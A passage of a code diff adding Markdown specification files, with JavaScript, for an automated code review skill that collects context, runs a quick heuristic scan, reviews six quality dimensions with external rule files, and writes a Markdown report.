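  total_lines: 12450,
  file_count: 87
};
```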
|
||||
## State Updates
|
||||
|
||||
```javascript
|
||||
return {
|
||||
stateUpdates: {
|
||||
status: 'running',
|
||||
context: {
|
||||
target_path: targetPath,
|
||||
files: fileList,
|
||||
language: primaryLanguage,
|
||||
framework: detectedFramework,
|
||||
total_lines: totalLines,
|
||||
file_count: fileCount
|
||||
}
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `context.json`
|
||||
- **Location**: `${workDir}/context.json`
|
||||
- **Format**: JSON
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error Type | Recovery |
|
||||
|------------|----------|
|
||||
| 路径不存在 | 提示用户重新输入 |
|
||||
| 无代码文件 | 返回错误,终止审查 |
|
||||
| 读取权限问题 | 跳过该文件,记录警告 |
|
||||
|
||||
## Next Actions
|
||||
|
||||
- 成功: action-quick-scan
|
||||
- 失败: action-abort
|
||||
.claude/skills/review-code/phases/actions/action-complete.md (new file, +115 lines)
@@ -0,0 +1,115 @@
|
||||
# Action: Complete
|
||||
|
||||
完成审查,保存最终状态。
|
||||
|
||||
## Purpose
|
||||
|
||||
结束代码审查流程:
|
||||
- 保存最终状态
|
||||
- 输出审查摘要
|
||||
- 提供报告路径
|
||||
|
||||
## Preconditions
|
||||
|
||||
- [ ] state.status === 'running'
|
||||
- [ ] state.report_generated === true
|
||||
|
||||
## Execution
|
||||
|
||||
```javascript
|
||||
async function execute(state, workDir) {
|
||||
// 1. 计算审查时长
|
||||
const duration = Date.now() - new Date(state.started_at).getTime();
|
||||
const durationMinutes = Math.round(duration / 60000);
|
||||
|
||||
// 2. 生成最终摘要
|
||||
const summary = {
|
||||
...state.summary,
|
||||
review_duration_ms: duration,
|
||||
completed_at: new Date().toISOString()
|
||||
};
|
||||
|
||||
// 3. 保存最终状态
|
||||
const finalState = {
|
||||
...state,
|
||||
status: 'completed',
|
||||
completed_at: summary.completed_at,
|
||||
summary: summary
|
||||
};
|
||||
|
||||
Write(`${workDir}/state.json`, JSON.stringify(finalState, null, 2));
|
||||
|
||||
// 4. 输出摘要信息
|
||||
console.log('========================================');
|
||||
console.log(' CODE REVIEW COMPLETED');
|
||||
console.log('========================================');
|
||||
console.log('');
|
||||
console.log(`📁 审查目标: ${state.context.target_path}`);
|
||||
console.log(`📄 文件数量: ${state.context.file_count}`);
|
||||
console.log(`📝 代码行数: ${state.context.total_lines}`);
|
||||
console.log('');
|
||||
console.log('--- 问题统计 ---');
|
||||
console.log(`🔴 Critical: ${summary.critical}`);
|
||||
console.log(`🟠 High: ${summary.high}`);
|
||||
console.log(`🟡 Medium: ${summary.medium}`);
|
||||
console.log(`🔵 Low: ${summary.low}`);
|
||||
console.log(`⚪ Info: ${summary.info}`);
|
||||
console.log(`📊 Total: ${summary.total_issues}`);
|
||||
console.log('');
|
||||
console.log(`⏱️ 审查用时: ${durationMinutes} 分钟`);
|
||||
console.log('');
|
||||
console.log(`📋 报告位置: ${state.report_path}`);
|
||||
console.log('========================================');
|
||||
|
||||
// 5. 返回状态更新
|
||||
return {
|
||||
stateUpdates: {
|
||||
status: 'completed',
|
||||
completed_at: summary.completed_at,
|
||||
summary: summary
|
||||
}
|
||||
};
|
||||
}
|
||||
```
|
||||
|
||||
## State Updates
|
||||
|
||||
```javascript
|
||||
return {
|
||||
stateUpdates: {
|
||||
status: 'completed',
|
||||
completed_at: new Date().toISOString(),
|
||||
summary: {
|
||||
total_issues: state.summary.total_issues,
|
||||
critical: state.summary.critical,
|
||||
high: state.summary.high,
|
||||
medium: state.summary.medium,
|
||||
low: state.summary.low,
|
||||
info: state.summary.info,
|
||||
review_duration_ms: duration
|
||||
}
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **Console**: 审查完成摘要
|
||||
- **State**: 最终状态保存到 `state.json`
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error Type | Recovery |
|
||||
|------------|----------|
|
||||
| 状态保存失败 | 输出到控制台 |
|
||||
|
||||
## Next Actions
|
||||
|
||||
- 无(终止状态)
|
||||
|
||||
## Post-Completion
|
||||
|
||||
用户可以:
|
||||
1. 查看完整报告: `cat ${workDir}/review-report.md`
|
||||
2. 查看问题详情: `cat ${workDir}/findings/*.json`
|
||||
3. 导出报告到其他位置
|
||||
.claude/skills/review-code/phases/actions/action-deep-review.md (new file, +302 lines)
@@ -0,0 +1,302 @@
|
||||
# Action: Deep Review
|
||||
|
||||
深入审查指定维度的代码质量。
|
||||
|
||||
## Purpose
|
||||
|
||||
针对单个维度进行深入审查:
|
||||
- 逐文件检查
|
||||
- 记录发现的问题
|
||||
- 提供具体的修复建议
|
||||
|
||||
## Preconditions
|
||||
|
||||
- [ ] state.status === 'running'
|
||||
- [ ] state.scan_completed === true
|
||||
- [ ] 存在未审查的维度
|
||||
|
||||
## Dimension Focus Areas
|
||||
|
||||
### Correctness (正确性)
|
||||
- 逻辑错误和边界条件
|
||||
- Null/undefined 处理
|
||||
- 错误处理完整性
|
||||
- 类型安全
|
||||
- 资源泄漏
|
||||
|
||||
### Readability (可读性)
|
||||
- 命名规范
|
||||
- 函数长度和复杂度
|
||||
- 代码重复
|
||||
- 注释质量
|
||||
- 代码组织
|
||||
|
||||
### Performance (性能)
|
||||
- 算法复杂度
|
||||
- 不必要的计算
|
||||
- 内存使用
|
||||
- I/O 效率
|
||||
- 缓存策略
|
||||
|
||||
### Security (安全性)
|
||||
- 注入风险 (SQL, XSS, Command)
|
||||
- 认证和授权
|
||||
- 敏感数据处理
|
||||
- 加密使用
|
||||
- 依赖安全
|
||||
|
||||
### Testing (测试)
|
||||
- 测试覆盖率
|
||||
- 边界条件测试
|
||||
- 错误路径测试
|
||||
- 测试可维护性
|
||||
- Mock 使用
|
||||
|
||||
### Architecture (架构)
|
||||
- 分层结构
|
||||
- 依赖方向
|
||||
- 单一职责
|
||||
- 接口设计
|
||||
- 扩展性
|
||||
|
||||
## Execution
|
||||
|
||||
```javascript
|
||||
async function execute(state, workDir, currentDimension) {
|
||||
const context = state.context;
|
||||
const dimension = currentDimension;
|
||||
const findings = [];
|
||||
|
||||
// 从外部 JSON 文件加载规则
|
||||
const rulesConfig = loadRulesConfig(dimension, workDir);
|
||||
const rules = rulesConfig.rules || [];
|
||||
const prefix = rulesConfig.prefix || getDimensionPrefix(dimension);
|
||||
|
||||
// 优先审查高风险区域
|
||||
const filesToReview = state.scan_summary?.risk_areas
|
||||
?.map(r => r.file)
|
||||
?.filter(f => context.files.includes(f)) || context.files;
|
||||
|
||||
const filesToCheck = [...new Set([
|
||||
...filesToReview.slice(0, 20),
|
||||
...context.files.slice(0, 30)
|
||||
])].slice(0, 50); // 最多50个文件
|
||||
|
||||
let findingCounter = 1;
|
||||
|
||||
for (const file of filesToCheck) {
|
||||
try {
|
||||
const content = Read(file);
|
||||
const lines = content.split('\n');
|
||||
|
||||
// 应用外部规则文件中的规则
|
||||
for (const rule of rules) {
|
||||
const matches = detectByPattern(content, lines, file, rule);
|
||||
for (const match of matches) {
|
||||
findings.push({
|
||||
id: `${prefix}-${String(findingCounter++).padStart(3, '0')}`,
|
||||
severity: rule.severity || match.severity,
|
||||
dimension: dimension,
|
||||
category: rule.category,
|
||||
file: file,
|
||||
line: match.line,
|
||||
code_snippet: match.snippet,
|
||||
description: rule.description,
|
||||
recommendation: rule.recommendation,
|
||||
fix_example: rule.fixExample
|
||||
});
|
||||
}
|
||||
}
|
||||
} catch (e) {
|
||||
// 跳过无法读取的文件
|
||||
}
|
||||
}
|
||||
|
||||
// 保存维度发现
|
||||
Write(`${workDir}/findings/${dimension}.json`, JSON.stringify(findings, null, 2));
|
||||
|
||||
return {
|
||||
stateUpdates: {
|
||||
reviewed_dimensions: [...(state.reviewed_dimensions || []), dimension],
|
||||
current_dimension: null,
|
||||
[`findings.${dimension}`]: findings
|
||||
}
|
||||
};
|
||||
}
|
||||
|
||||
/**
|
||||
* 从外部 JSON 文件加载规则配置
|
||||
* 规则文件位于 specs/rules/{dimension}-rules.json
|
||||
* @param {string} dimension - 维度名称 (correctness, security, etc.)
|
||||
* @param {string} workDir - 工作目录 (用于日志记录)
|
||||
* @returns {object} 规则配置对象,包含 rules 数组和 prefix
|
||||
*/
|
||||
function loadRulesConfig(dimension, workDir) {
|
||||
// 规则文件路径:相对于 skill 目录
|
||||
const rulesPath = `specs/rules/${dimension}-rules.json`;
|
||||
|
||||
try {
|
||||
const rulesFile = Read(rulesPath);
|
||||
const rulesConfig = JSON.parse(rulesFile);
|
||||
return rulesConfig;
|
||||
} catch (e) {
|
||||
console.warn(`Failed to load rules for ${dimension}: ${e.message}`);
|
||||
// 返回空规则配置,保持向后兼容
|
||||
return { rules: [], prefix: getDimensionPrefix(dimension) };
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* 根据规则的 patternType 检测代码问题
|
||||
* 支持的 patternType: regex, includes
|
||||
* @param {string} content - 文件内容
|
||||
* @param {string[]} lines - 按行分割的内容
|
||||
* @param {string} file - 文件路径
|
||||
* @param {object} rule - 规则配置对象
|
||||
* @returns {Array} 匹配结果数组
|
||||
*/
|
||||
function detectByPattern(content, lines, file, rule) {
|
||||
const matches = [];
|
||||
const { pattern, patternType, negativePatterns, caseInsensitive } = rule;
|
||||
|
||||
if (!pattern) return matches;
|
||||
|
||||
switch (patternType) {
|
||||
case 'regex':
|
||||
return detectByRegex(content, lines, pattern, negativePatterns, caseInsensitive);
|
||||
|
||||
case 'includes':
|
||||
return detectByIncludes(content, lines, pattern, negativePatterns);
|
||||
|
||||
default:
|
||||
// 默认使用 includes 模式
|
||||
return detectByIncludes(content, lines, pattern, negativePatterns);
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* 使用正则表达式检测代码问题
|
||||
* @param {string} content - 文件完整内容
|
||||
* @param {string[]} lines - 按行分割的内容
|
||||
* @param {string} pattern - 正则表达式模式
|
||||
* @param {string[]} negativePatterns - 排除模式列表
|
||||
* @param {boolean} caseInsensitive - 是否忽略大小写
|
||||
* @returns {Array} 匹配结果数组
|
||||
*/
|
||||
function detectByRegex(content, lines, pattern, negativePatterns, caseInsensitive) {
|
||||
const matches = [];
|
||||
const flags = caseInsensitive ? 'gi' : 'g';
|
||||
|
||||
try {
|
||||
const regex = new RegExp(pattern, flags);
|
||||
let match;
|
||||
|
||||
while ((match = regex.exec(content)) !== null) {
|
||||
const lineNum = content.substring(0, match.index).split('\n').length;
|
||||
const lineContent = lines[lineNum - 1] || '';
|
||||
|
||||
// 检查排除模式 - 如果行内容匹配任一排除模式则跳过
|
||||
if (negativePatterns && negativePatterns.length > 0) {
|
||||
const shouldExclude = negativePatterns.some(np => {
|
||||
try {
|
||||
return new RegExp(np).test(lineContent);
|
||||
} catch {
|
||||
return lineContent.includes(np);
|
||||
}
|
||||
});
|
||||
if (shouldExclude) continue;
|
||||
}
|
||||
|
||||
matches.push({
|
||||
line: lineNum,
|
||||
snippet: lineContent.trim().substring(0, 100),
|
||||
matchedText: match[0]
|
||||
});
|
||||
}
|
||||
} catch (e) {
|
||||
console.warn(`Invalid regex pattern: ${pattern}`);
|
||||
}
|
||||
|
||||
return matches;
|
||||
}
|
||||
|
||||
/**
|
||||
* 使用字符串包含检测代码问题
|
||||
* @param {string} content - 文件完整内容 (未使用但保持接口一致)
|
||||
* @param {string[]} lines - 按行分割的内容
|
||||
* @param {string} pattern - 要查找的字符串
|
||||
* @param {string[]} negativePatterns - 排除模式列表
|
||||
* @returns {Array} 匹配结果数组
|
||||
*/
|
||||
function detectByIncludes(content, lines, pattern, negativePatterns) {
|
||||
const matches = [];
|
||||
|
||||
lines.forEach((line, i) => {
|
||||
if (line.includes(pattern)) {
|
||||
// 检查排除模式 - 如果行内容包含任一排除字符串则跳过
|
||||
if (negativePatterns && negativePatterns.length > 0) {
|
||||
const shouldExclude = negativePatterns.some(np => line.includes(np));
|
||||
if (shouldExclude) return;
|
||||
}
|
||||
|
||||
matches.push({
|
||||
line: i + 1,
|
||||
snippet: line.trim().substring(0, 100),
|
||||
matchedText: pattern
|
||||
});
|
||||
}
|
||||
});
|
||||
|
||||
return matches;
|
||||
}
|
||||
|
||||
/**
|
||||
* 获取维度前缀(作为规则文件不存在时的备用)
|
||||
* @param {string} dimension - 维度名称
|
||||
* @returns {string} 4字符前缀
|
||||
*/
|
||||
function getDimensionPrefix(dimension) {
|
||||
const prefixes = {
|
||||
correctness: 'CORR',
|
||||
readability: 'READ',
|
||||
performance: 'PERF',
|
||||
security: 'SEC',
|
||||
testing: 'TEST',
|
||||
architecture: 'ARCH'
|
||||
};
|
||||
return prefixes[dimension] || 'MISC';
|
||||
}
|
||||
```
|
||||
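An illustrative rules file, shown here as a JavaScript literal. The field names follow what `detectByPattern` and the findings loop above read (`pattern`, `patternType`, `negativePatterns`, `caseInsensitive`, `severity`, `category`, `description`, `recommendation`, `fixExample`, plus the top-level `prefix`); the concrete values are invented:

```javascript
// Hypothetical content of specs/rules/security-rules.json
const securityRulesConfig = {
  prefix: "SEC",
  rules: [
    {
      category: "hardcoded-credential",
      severity: "high",
      patternType: "regex",
      pattern: "(password|secret|api_key|token)\\s*[=:]\\s*['\"][^'\"]{8,}",
      negativePatterns: ["process\\.env", "example", "placeholder"],
      caseInsensitive: true,
      description: "Possible hardcoded credential",
      recommendation: "Load secrets from environment variables or a secret manager",
      fixExample: "const apiKey = process.env.API_KEY;"
    }
  ]
};
```

With a rule like this, `detectByPattern` would flag a line such as `const apiKey = "abcd1234efgh"` while skipping lines that reference `process.env`.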
|
||||
## State Updates
|
||||
|
||||
```javascript
|
||||
return {
|
||||
stateUpdates: {
|
||||
reviewed_dimensions: [...state.reviewed_dimensions, currentDimension],
|
||||
current_dimension: null,
|
||||
findings: {
|
||||
...state.findings,
|
||||
[currentDimension]: newFindings
|
||||
}
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `findings/{dimension}.json`
|
||||
- **Location**: `${workDir}/findings/`
|
||||
- **Format**: JSON array of Finding objects
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error Type | Recovery |
|
||||
|------------|----------|
|
||||
| 文件读取失败 | 跳过该文件,记录警告 |
|
||||
| 规则执行错误 | 跳过该规则,继续其他规则 |
|
||||
|
||||
## Next Actions
|
||||
|
||||
- 还有未审查维度: 继续 action-deep-review
|
||||
- 所有维度完成: action-generate-report
|
||||
@@ -0,0 +1,263 @@
|
||||
# Action: Generate Report
|
||||
|
||||
汇总所有发现,生成结构化审查报告。
|
||||
|
||||
## Purpose
|
||||
|
||||
生成最终的代码审查报告:
|
||||
- 汇总所有维度的发现
|
||||
- 按严重程度排序
|
||||
- 提供统计摘要
|
||||
- 输出 Markdown 格式报告
|
||||
|
||||
## Preconditions
|
||||
|
||||
- [ ] state.status === 'running'
|
||||
- [ ] 所有维度已审查完成 (reviewed_dimensions.length === 6)
|
||||
|
||||
## Execution
|
||||
|
||||
```javascript
|
||||
async function execute(state, workDir) {
|
||||
const context = state.context;
|
||||
const findings = state.findings;
|
||||
|
||||
// 1. 汇总所有发现
|
||||
const allFindings = [
|
||||
...findings.correctness,
|
||||
...findings.readability,
|
||||
...findings.performance,
|
||||
...findings.security,
|
||||
...findings.testing,
|
||||
...findings.architecture
|
||||
];
|
||||
|
||||
// 2. 按严重程度排序
|
||||
const severityOrder = { critical: 0, high: 1, medium: 2, low: 3, info: 4 };
|
||||
allFindings.sort((a, b) => severityOrder[a.severity] - severityOrder[b.severity]);
|
||||
|
||||
// 3. 统计
|
||||
const stats = {
|
||||
total_issues: allFindings.length,
|
||||
critical: allFindings.filter(f => f.severity === 'critical').length,
|
||||
high: allFindings.filter(f => f.severity === 'high').length,
|
||||
medium: allFindings.filter(f => f.severity === 'medium').length,
|
||||
low: allFindings.filter(f => f.severity === 'low').length,
|
||||
info: allFindings.filter(f => f.severity === 'info').length,
|
||||
by_dimension: {
|
||||
correctness: findings.correctness.length,
|
||||
readability: findings.readability.length,
|
||||
performance: findings.performance.length,
|
||||
security: findings.security.length,
|
||||
testing: findings.testing.length,
|
||||
architecture: findings.architecture.length
|
||||
}
|
||||
};
|
||||
|
||||
// 4. 生成报告
|
||||
const report = generateMarkdownReport(context, stats, allFindings, state.scan_summary);
|
||||
|
||||
// 5. 保存报告
|
||||
const reportPath = `${workDir}/review-report.md`;
|
||||
Write(reportPath, report);
|
||||
|
||||
return {
|
||||
stateUpdates: {
|
||||
report_generated: true,
|
||||
report_path: reportPath,
|
||||
summary: {
|
||||
...stats,
|
||||
review_duration_ms: Date.now() - new Date(state.started_at).getTime()
|
||||
}
|
||||
}
|
||||
};
|
||||
}
|
||||
|
||||
function generateMarkdownReport(context, stats, findings, scanSummary) {
|
||||
const severityEmoji = {
|
||||
critical: '🔴',
|
||||
high: '🟠',
|
||||
medium: '🟡',
|
||||
low: '🔵',
|
||||
info: '⚪'
|
||||
};
|
||||
|
||||
let report = `# Code Review Report
|
||||
|
||||
## 审查概览
|
||||
|
||||
| 项目 | 值 |
|
||||
|------|------|
|
||||
| 目标路径 | \`${context.target_path}\` |
|
||||
| 文件数量 | ${context.file_count} |
|
||||
| 代码行数 | ${context.total_lines} |
|
||||
| 主要语言 | ${context.language} |
|
||||
| 框架 | ${context.framework || 'N/A'} |
|
||||
|
||||
## 问题统计
|
||||
|
||||
| 严重程度 | 数量 |
|
||||
|----------|------|
|
||||
| 🔴 Critical | ${stats.critical} |
|
||||
| 🟠 High | ${stats.high} |
|
||||
| 🟡 Medium | ${stats.medium} |
|
||||
| 🔵 Low | ${stats.low} |
|
||||
| ⚪ Info | ${stats.info} |
|
||||
| **总计** | **${stats.total_issues}** |
|
||||
|
||||
### 按维度统计
|
||||
|
||||
| 维度 | 问题数 |
|
||||
|------|--------|
|
||||
| Correctness (正确性) | ${stats.by_dimension.correctness} |
|
||||
| Security (安全性) | ${stats.by_dimension.security} |
|
||||
| Performance (性能) | ${stats.by_dimension.performance} |
|
||||
| Readability (可读性) | ${stats.by_dimension.readability} |
|
||||
| Testing (测试) | ${stats.by_dimension.testing} |
|
||||
| Architecture (架构) | ${stats.by_dimension.architecture} |
|
||||
|
||||
---
|
||||
|
||||
## 高风险区域
|
||||
|
||||
`;
|
||||
|
||||
if (scanSummary?.risk_areas?.length > 0) {
|
||||
report += `| 文件 | 原因 | 优先级 |
|
||||
|------|------|--------|
|
||||
`;
|
||||
for (const area of scanSummary.risk_areas.slice(0, 10)) {
|
||||
report += `| \`${area.file}\` | ${area.reason} | ${area.priority} |\n`;
|
||||
}
|
||||
} else {
|
||||
report += `未发现明显的高风险区域。\n`;
|
||||
}
|
||||
|
||||
report += `
|
||||
---
|
||||
|
||||
## 问题详情
|
||||
|
||||
`;
|
||||
|
||||
// 按维度分组输出
|
||||
const dimensions = ['correctness', 'security', 'performance', 'readability', 'testing', 'architecture'];
|
||||
const dimensionNames = {
|
||||
correctness: '正确性 (Correctness)',
|
||||
security: '安全性 (Security)',
|
||||
performance: '性能 (Performance)',
|
||||
readability: '可读性 (Readability)',
|
||||
testing: '测试 (Testing)',
|
||||
architecture: '架构 (Architecture)'
|
||||
};
|
||||
|
||||
for (const dim of dimensions) {
|
||||
const dimFindings = findings.filter(f => f.dimension === dim);
|
||||
if (dimFindings.length === 0) continue;
|
||||
|
||||
report += `### ${dimensionNames[dim]}
|
||||
|
||||
`;
|
||||
|
||||
for (const finding of dimFindings) {
|
||||
report += `#### ${severityEmoji[finding.severity]} [${finding.id}] ${finding.category}
|
||||
|
||||
- **严重程度**: ${finding.severity.toUpperCase()}
|
||||
- **文件**: \`${finding.file}\`${finding.line ? `:${finding.line}` : ''}
|
||||
- **描述**: ${finding.description}
|
||||
`;
|
||||
|
||||
if (finding.code_snippet) {
|
||||
report += `
|
||||
\`\`\`
|
||||
${finding.code_snippet}
|
||||
\`\`\`
|
||||
`;
|
||||
}
|
||||
|
||||
report += `
|
||||
**建议**: ${finding.recommendation}
|
||||
`;
|
||||
|
||||
if (finding.fix_example) {
|
||||
report += `
|
||||
**修复示例**:
|
||||
\`\`\`
|
||||
${finding.fix_example}
|
||||
\`\`\`
|
||||
`;
|
||||
}
|
||||
|
||||
report += `
|
||||
---
|
||||
|
||||
`;
|
||||
}
|
||||
}
|
||||
|
||||
report += `
|
||||
## 审查建议
|
||||
|
||||
### 必须修复 (Must Fix)
|
||||
|
||||
${stats.critical + stats.high > 0
|
||||
? `发现 ${stats.critical} 个严重问题和 ${stats.high} 个高优先级问题,建议在合并前修复。`
|
||||
: '未发现必须立即修复的问题。'}
|
||||
|
||||
### 建议改进 (Should Fix)
|
||||
|
||||
${stats.medium > 0
|
||||
? `发现 ${stats.medium} 个中等优先级问题,建议在后续迭代中改进。`
|
||||
: '代码质量良好,无明显需要改进的地方。'}
|
||||
|
||||
### 可选优化 (Nice to Have)
|
||||
|
||||
${stats.low + stats.info > 0
|
||||
? `发现 ${stats.low + stats.info} 个低优先级建议,可根据团队规范酌情处理。`
|
||||
: '无额外建议。'}
|
||||
|
||||
---
|
||||
|
||||
*报告生成时间: ${new Date().toISOString()}*
|
||||
`;
|
||||
|
||||
return report;
|
||||
}
|
||||
```
|
||||
|
||||
## State Updates
|
||||
|
||||
```javascript
|
||||
return {
|
||||
stateUpdates: {
|
||||
report_generated: true,
|
||||
report_path: reportPath,
|
||||
summary: {
|
||||
total_issues: totalCount,
|
||||
critical: criticalCount,
|
||||
high: highCount,
|
||||
medium: mediumCount,
|
||||
low: lowCount,
|
||||
info: infoCount,
|
||||
review_duration_ms: duration
|
||||
}
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `review-report.md`
|
||||
- **Location**: `${workDir}/review-report.md`
|
||||
- **Format**: Markdown
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error Type | Recovery |
|
||||
|------------|----------|
|
||||
| 写入失败 | 尝试备用位置 |
|
||||
| 模板错误 | 使用简化格式 |
|
||||
|
||||
## Next Actions
|
||||
|
||||
- 成功: action-complete
|
||||
.claude/skills/review-code/phases/actions/action-quick-scan.md (new file, +164 lines)
@@ -0,0 +1,164 @@
|
||||
# Action: Quick Scan
|
||||
|
||||
快速扫描代码,识别高风险区域。
|
||||
|
||||
## Purpose
|
||||
|
||||
进行第一遍快速扫描:
|
||||
- 识别复杂度高的文件
|
||||
- 标记潜在的高风险区域
|
||||
- 发现明显的问题模式
|
||||
|
||||
## Preconditions
|
||||
|
||||
- [ ] state.status === 'running'
|
||||
- [ ] state.context !== null
|
||||
|
||||
## Execution
|
||||
|
||||
```javascript
|
||||
async function execute(state, workDir) {
|
||||
const context = state.context;
|
||||
const riskAreas = [];
|
||||
const quickIssues = [];
|
||||
|
||||
// 1. 扫描每个文件
|
||||
for (const file of context.files) {
|
||||
try {
|
||||
const content = Read(file);
|
||||
const lines = content.split('\n');
|
||||
|
||||
// --- 复杂度检查 ---
|
||||
const functionMatches = content.match(/function\s+\w+|=>\s*{|async\s+\w+/g) || [];
|
||||
const nestingDepth = Math.max(...lines.map(l => (l.match(/^\s*/)?.[0].length || 0) / 2));
|
||||
|
||||
if (lines.length > 500 || functionMatches.length > 20 || nestingDepth > 8) {
|
||||
riskAreas.push({
|
||||
file: file,
|
||||
reason: `High complexity: ${lines.length} lines, ${functionMatches.length} functions, depth ${nestingDepth}`,
|
||||
priority: 'high'
|
||||
});
|
||||
}
|
||||
|
||||
// --- 快速问题检测 ---
|
||||
|
||||
// 安全问题快速检测
|
||||
if (content.includes('eval(') || content.includes('innerHTML')) {
|
||||
quickIssues.push({
|
||||
type: 'security',
|
||||
file: file,
|
||||
message: 'Potential XSS/injection risk: eval() or innerHTML usage'
|
||||
});
|
||||
}
|
||||
|
||||
// 硬编码密钥检测
|
||||
if (/(?:password|secret|api_key|token)\s*[=:]\s*['"][^'"]{8,}/i.test(content)) {
|
||||
quickIssues.push({
|
||||
type: 'security',
|
||||
file: file,
|
||||
message: 'Potential hardcoded credential detected'
|
||||
});
|
||||
}
|
||||
|
||||
// TODO/FIXME 检测
|
||||
const todoCount = (content.match(/TODO|FIXME|HACK|XXX/gi) || []).length;
|
||||
if (todoCount > 5) {
|
||||
quickIssues.push({
|
||||
type: 'maintenance',
|
||||
file: file,
|
||||
message: `${todoCount} TODO/FIXME comments found`
|
||||
});
|
||||
}
|
||||
|
||||
// console.log 检测(生产代码)
|
||||
if (!file.includes('test') && !file.includes('spec')) {
|
||||
const consoleCount = (content.match(/console\.(log|debug|info)/g) || []).length;
|
||||
if (consoleCount > 3) {
|
||||
quickIssues.push({
|
||||
type: 'readability',
|
||||
file: file,
|
||||
message: `${consoleCount} console statements (should be removed in production)`
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
// 长函数检测
|
||||
const longFunctions = content.match(/function[^{]+\{[^}]{2000,}\}/g) || [];
|
||||
if (longFunctions.length > 0) {
|
||||
quickIssues.push({
|
||||
type: 'readability',
|
||||
file: file,
|
||||
message: `${longFunctions.length} long function(s) detected (function body over 2000 characters)`
|
||||
});
|
||||
}
|
||||
|
||||
// 错误处理检测
|
||||
      if (/catch\s*\([^)]*\)\s*\{\s*\}/.test(content)) {  // regex also matches `catch(e){}` without a space
|
||||
quickIssues.push({
|
||||
type: 'correctness',
|
||||
file: file,
|
||||
message: 'Empty catch block detected'
|
||||
});
|
||||
}
|
||||
|
||||
} catch (e) {
|
||||
// 跳过无法读取的文件
|
||||
}
|
||||
}
|
||||
|
||||
// 2. 计算复杂度评分
|
||||
const complexityScore = Math.min(100, Math.round(
|
||||
(riskAreas.length * 10 + quickIssues.length * 5) / context.file_count * 100
|
||||
));
|
||||
|
||||
// 3. 构建扫描摘要
|
||||
const scanSummary = {
|
||||
risk_areas: riskAreas,
|
||||
complexity_score: complexityScore,
|
||||
quick_issues: quickIssues
|
||||
};
|
||||
|
||||
// 4. 保存扫描结果
|
||||
Write(`${workDir}/scan-summary.json`, JSON.stringify(scanSummary, null, 2));
|
||||
|
||||
return {
|
||||
stateUpdates: {
|
||||
scan_completed: true,
|
||||
scan_summary: scanSummary
|
||||
}
|
||||
};
|
||||
}
|
||||
```
|
||||
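As a rough worked example of the complexity score above: for 100 files with 3 high-complexity risk areas and 8 quick issues, the score is min(100, round((3×10 + 8×5) / 100 × 100)) = 70. Because of the cap at 100, small codebases with even a handful of findings saturate the score quickly.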
|
||||
## State Updates
|
||||
|
||||
```javascript
|
||||
return {
|
||||
stateUpdates: {
|
||||
scan_completed: true,
|
||||
scan_summary: {
|
||||
risk_areas: riskAreas,
|
||||
complexity_score: score,
|
||||
quick_issues: quickIssues
|
||||
}
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `scan-summary.json`
|
||||
- **Location**: `${workDir}/scan-summary.json`
|
||||
- **Format**: JSON
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error Type | Recovery |
|
||||
|------------|----------|
|
||||
| 文件读取失败 | 跳过该文件,继续扫描 |
|
||||
| 编码问题 | 以二进制跳过 |
|
||||
|
||||
## Next Actions
|
||||
|
||||
- 成功: action-deep-review (开始逐维度审查)
|
||||
- 风险区域过多 (>20): 可询问用户是否缩小范围
|
||||
.claude/skills/review-code/phases/orchestrator.md (new file, +251 lines)
@@ -0,0 +1,251 @@
|
||||
# Orchestrator
|
||||
|
||||
根据当前状态选择并执行下一个审查动作。
|
||||
|
||||
## Role
|
||||
|
||||
Code Review 编排器,负责:
|
||||
1. 读取当前审查状态
|
||||
2. 根据状态选择下一个动作
|
||||
3. 执行动作并更新状态
|
||||
4. 循环直到审查完成
|
||||
|
||||
## Dependencies
|
||||
|
||||
- **State Manager**: [state-manager.md](./state-manager.md) - 提供原子化状态操作、自动备份、验证和回滚功能
|
||||
|
||||
## State Management
|
||||
|
||||
本模块使用 StateManager 进行所有状态操作,确保:
|
||||
- **原子更新** - 写入临时文件后重命名,防止损坏
|
||||
- **自动备份** - 每次更新前自动创建备份
|
||||
- **回滚能力** - 失败时可从备份恢复
|
||||
- **结构验证** - 确保状态结构完整性
|
||||
|
||||
### StateManager API (from state-manager.md)
|
||||
|
||||
```javascript
|
||||
// 初始化状态
|
||||
StateManager.initState(workDir)
|
||||
|
||||
// 读取当前状态
|
||||
StateManager.getState(workDir)
|
||||
|
||||
// 更新状态(原子操作,自动备份)
|
||||
StateManager.updateState(workDir, updates)
|
||||
|
||||
// 获取下一个待审查维度
|
||||
StateManager.getNextDimension(state)
|
||||
|
||||
// 标记维度完成
|
||||
StateManager.markDimensionComplete(workDir, dimension)
|
||||
|
||||
// 记录错误
|
||||
StateManager.recordError(workDir, action, message)
|
||||
|
||||
// 从备份恢复
|
||||
StateManager.restoreState(workDir)
|
||||
```
|
||||
|
||||
## Decision Logic
|
||||
|
||||
```javascript
|
||||
function selectNextAction(state) {
|
||||
// 1. 终止条件检查
|
||||
if (state.status === 'completed') return null;
|
||||
if (state.status === 'user_exit') return null;
|
||||
if (state.error_count >= 3) return 'action-abort';
|
||||
|
||||
// 2. 初始化阶段
|
||||
if (state.status === 'pending' || !state.context) {
|
||||
return 'action-collect-context';
|
||||
}
|
||||
|
||||
// 3. 快速扫描阶段
|
||||
if (!state.scan_completed) {
|
||||
return 'action-quick-scan';
|
||||
}
|
||||
|
||||
// 4. 深入审查阶段 - 使用 StateManager 获取下一个维度
|
||||
const nextDimension = StateManager.getNextDimension(state);
|
||||
if (nextDimension) {
|
||||
return 'action-deep-review'; // 传递 dimension 参数
|
||||
}
|
||||
|
||||
// 5. 报告生成阶段
|
||||
if (!state.report_generated) {
|
||||
return 'action-generate-report';
|
||||
}
|
||||
|
||||
// 6. 完成
|
||||
return 'action-complete';
|
||||
}
|
||||
```
|
